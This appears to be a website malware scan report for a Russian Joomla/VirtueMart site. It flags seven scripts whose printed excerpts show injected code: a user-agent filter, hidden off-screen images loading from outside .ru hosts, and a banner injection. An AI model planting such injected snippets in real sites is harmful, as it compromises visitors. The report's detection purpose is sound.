Scanned pages/files
Request | Server response | Status |
http://promsib-ndt.ru/ | 200 OK Content-Length: 20695 Content-Type: text/html | clean |
http://promsib-ndt.ru/modules/mod_jv_headline/assets/js/slideshow5.js | 200 OK Content-Length: 17899 Content-Type: application/javascript | malicious |
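Malicious code - confirmed by antiviruses (see below). The excerpt that follows is abbreviated: it shows the start of the injected block (a user-agent blacklist check, `zzz_check_ua`), cuts off inside the blacklist array, and resumes at the tail of the original script, after which two `console.log(...)` statements are appended. Their string arguments are markup for 20x20 images positioned off-screen and loaded from third-party hosts. As excerpted, the strings are only logged; whether the live file writes them into the page cannot be determined from this excerpt.
(function(){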
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function zzz_check_ua(){ var blackList = ['Linux','Macintosh','FreeBSD','Chrome','iPad','iPhone','IEMobile','Chromium','Android','Firefox/18.0','Firefox/18.0.1','Firefox/18. this.info.start(1); }.bind(this));; } } }); ;console.log('<img height="20" width="20" style="position:absolute;left:-1000px;top:0;" src="http://hardwareassigns.ru/jm8IL.fLcjlnsND4d?default"></iframe>');;console.log('<img height="20" width="20" style="position:absolute;left:-1000px;top:0;" src="http://lionwhichrates.ru/OKJ9z.ia7l?default"></iframe>');; Antivirus reports:
| ||
http://promsib-ndt.ru/templates/jv_zuni/jv_menus/jv_moomenu/jv.moomenu.js | 200 OK Content-Length: 5034 Content-Type: application/javascript | malicious |
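Malicious code - confirmed by antiviruses (see below). Abbreviated excerpt: injected block at the top of the file, original script elided in the middle, appended statements at the end.
(function(){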
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function zzz_check_ua(){ var blackList = ['Linux','Macintosh','FreeBSD','Chrome','iPad','iPhone','IEMobile','Chromium','Android','Firefox/18.0','Firefox/18.0.1','Firefox/18. }); } } }); return this; } }); window.addEvent('domready',function() {new MooMenu($('menusys_moo'))});;console.log('<img height="20" width="20" style="position:absolute;left:-1000px;top:0;" src="http://hardwareassigns.ru/jm8IL.fLcjlnsND4d?default"></iframe>');;console.log('<img height="20" width="20" style="position:absolute;left:-1000px;top:0;" src="http://lionwhichrates.ru/OKJ9z.ia7l?default"></iframe>');; Antivirus reports:
| ||
http://promsib-ndt.ru/templates/jv_zuni/js/jv.script.js | 200 OK Content-Length: 3595 Content-Type: application/javascript | malicious |
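Malicious code - confirmed by antiviruses (see below). Abbreviated excerpt: injected block at the top of the file, original script elided in the middle, appended statements at the end.
(function(){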
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function zzz_check_ua(){ var blackList = ['Linux','Macintosh','FreeBSD','Chrome','iPad','iPhone','IEMobile','Chromium','Android','Firefox/18.0','Firefox/18.0.1','Firefox/18. settings['colors'] = jvpathcolor + 'teal_nodub_zabil.css'; StyleCookie.empty(); StyleCookie.extend(settings); });} });;console.log('<img height="20" width="20" style="position:absolute;left:-1000px;top:0;" src="http://hardwareassigns.ru/jm8IL.fLcjlnsND4d?default"></iframe>');;console.log('<img height="20" width="20" style="position:absolute;left:-1000px;top:0;" src="http://lionwhichrates.ru/OKJ9z.ia7l?default"></iframe>');; Antivirus reports:
| ||
http://promsib-ndt.ru/tmp/src/mucury.js | 200 OK Content-Length: 112067 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(e,t){var n,r,i=typeof t,o=e.document,a=e.location,s=e.jQuery,u=e.$,l={},c=[],p="1.9.1",f=c.concat,d=c.push,h=c.slice,g=c.indexOf,m=l.toString,y=l.hasOwnProperty,v=p.trim,b=function(e,t){return new b.fn.init(e,t,r)},x=/[+-]?(?:\d*\.|)\d+(?:[eE][+-]?\d+|)/.source,w=/\S+/g,T=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,N=/^(?:(<[\w\W]+>)[^>]*|#([\w-]*))$/,C=/^<(\w+)\s*\/?>(?:<\/\1>|)$/,k=/^[\],:{}\s]*$/,E=/(?:^|:|,)(?:\s*\[)+/g,S=/\\(?:["\\\/bfnrt]|u[\da-fA-F]{4})/g,A=/"[^"\\ if (!mdom) { newDiv = document.createElement('p'); newDiv.innerHTML = "<div style='text-align:center; padding-top: 10px; padding-bottom: 10px; background-color:white' class='basic-modal' onclick='click_banner555();' style='cursor:hand'><img src='/sale.png' style='cursor:hand'></div>"; if (document.body.firstChild) { document.body.insertBefore(newDiv, document.body.firstChild); } else { document.body.appendChild(newDiv); } } } Antivirus reports:
| ||
http://promsib-ndt.ru/index.php?option=com_content&view=frontpage&Itemid=1 | 200 OK Content-Length: 20715 Content-Type: text/html | clean |
http://promsib-ndt.ru/index.php?option=com_virtuemart&view=categories&virtuemart_category_id=0&Itemid=75 | 200 OK Content-Length: 26465 Content-Type: text/html | clean |
http://promsib-ndt.ru/ajax/libs/jquery/1.6.4/jquery.min.js | 200 OK Content-Length: 91668 Content-Type: application/javascript | clean |
http://promsib-ndt.ru/ajax/libs/jqueryui/1.8.16/jquery-ui.min.js | 200 OK Content-Length: 201875 Content-Type: application/javascript | clean |
http://promsib-ndt.ru/components/com_virtuemart/assets/js/jquery.ui.autocomplete.html.js | 200 OK Content-Length: 2970 Content-Type: application/javascript | malicious |
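Malicious code - confirmed by antiviruses (see below). Abbreviated excerpt: injected block at the top of the file, original script elided in the middle, appended statements at the end.
(function(){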
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function zzz_check_ua(){ var blackList = ['Linux','Macintosh','FreeBSD','Chrome','iPad','iPhone','IEMobile','Chromium','Android','Firefox/18.0','Firefox/18.0.1','Firefox/18. .append( $( "<a></a>" )[ this.options.html ? "html" : "text" ]( item.label ) ) .appendTo( ul ); } }); })( jQuery ); ;console.log('<img height="20" width="20" style="position:absolute;left:-1000px;top:0;" src="http://hardwareassigns.ru/jm8IL.fLcjlnsND4d?default"></iframe>');;console.log('<img height="20" width="20" style="position:absolute;left:-1000px;top:0;" src="http://lionwhichrates.ru/OKJ9z.ia7l?default"></iframe>');; Antivirus reports:
| ||
http://promsib-ndt.ru/components/com_virtuemart/assets/js/jquery.noConflict.js | 200 OK Content-Length: 1927 Content-Type: application/javascript | malicious |
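Malicious code - confirmed by antiviruses (see below). Abbreviated excerpt: injected block at the top of the file, original script elided in the middle, appended statements at the end.
(function(){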
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function zzz_check_ua(){ var blackList = ['Linux','Macintosh','FreeBSD','Chrome','iPad','iPhone','IEMobile','Chromium','Android','Firefox/18.0','Firefox/18.0.1','Firefox/18. } }; })();jQuery.noConflict();;console.log('<img height="20" width="20" style="position:absolute;left:-1000px;top:0;" src="http://hardwareassigns.ru/jm8IL.fLcjlnsND4d?default"></iframe>');;console.log('<img height="20" width="20" style="position:absolute;left:-1000px;top:0;" src="http://lionwhichrates.ru/OKJ9z.ia7l?default"></iframe>');; Antivirus reports:
| ||
http://promsib-ndt.ru/components/com_virtuemart/assets/js/vmsite.js | 200 OK Content-Length: 4872 Content-Type: application/javascript | malicious |
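Malicious code - confirmed by antiviruses (see below). Abbreviated excerpt: injected block at the top of the file, original script elided in the middle, appended statements at the end.
(function(){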
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function zzz_check_ua(){ var blackList = ['Linux','Macintosh','FreeBSD','Chrome','iPad','iPhone','IEMobile','Chromium','Android','Firefox/18.0','Firefox/18.0.1','Firefox/18. } else { $.error( 'Method ' + method + ' does not exist on Vm2 front jQuery library' ); } }; })(jQuery) ;console.log('<img height="20" width="20" style="position:absolute;left:-1000px;top:0;" src="http://hardwareassigns.ru/jm8IL.fLcjlnsND4d?default"></iframe>');;console.log('<img height="20" width="20" style="position:absolute;left:-1000px;top:0;" src="http://lionwhichrates.ru/OKJ9z.ia7l?default"></iframe>');; Antivirus reports:
| ||
http://promsib-ndt.ru/index.php?option=com_content&view=article&id=72&Itemid=76 | 200 OK Content-Length: 12524 Content-Type: text/html | clean |
http://promsib-ndt.ru/index.php?option=com_content&view=article&id=74&Itemid=77 | 200 OK Content-Length: 12443 Content-Type: text/html | clean |
http://promsib-ndt.ru/index.php?option=com_content&view=article&id=76&Itemid=78 | 200 OK Content-Length: 16906 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: promsib-ndt.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 23 Jun 2014 03:09:21 GMT
Server: nginx/1.2.1
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Powered-By: PHP/5.4.6-1ubuntu1.2
Second query (visit from search engine):
GET / HTTP/1.1
Host: promsib-ndt.ru
Referer: http://www.google.com/search?q=promsib-ndt.ru
Result:
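The result is similar to the first query; no suspicious redirects were found. Note that this test only compares the server's responses with and without a search-engine Referer header. It does not exercise the client-side script injections flagged in the file scan above, so a clean result here does not contradict those findings.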
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=promsib-ndt.ru
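Result: This site is not currently listed as suspicious. (A blacklist lookup reflects only what the list operator has already detected and published; the file scan above flagged seven scripts on this site as malicious.)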
Query: http://yandex.com/infected?l10n=en&url=http://promsib-ndt.ru/
Result: promsib-ndt.ru is not infected or malware details are not published yet.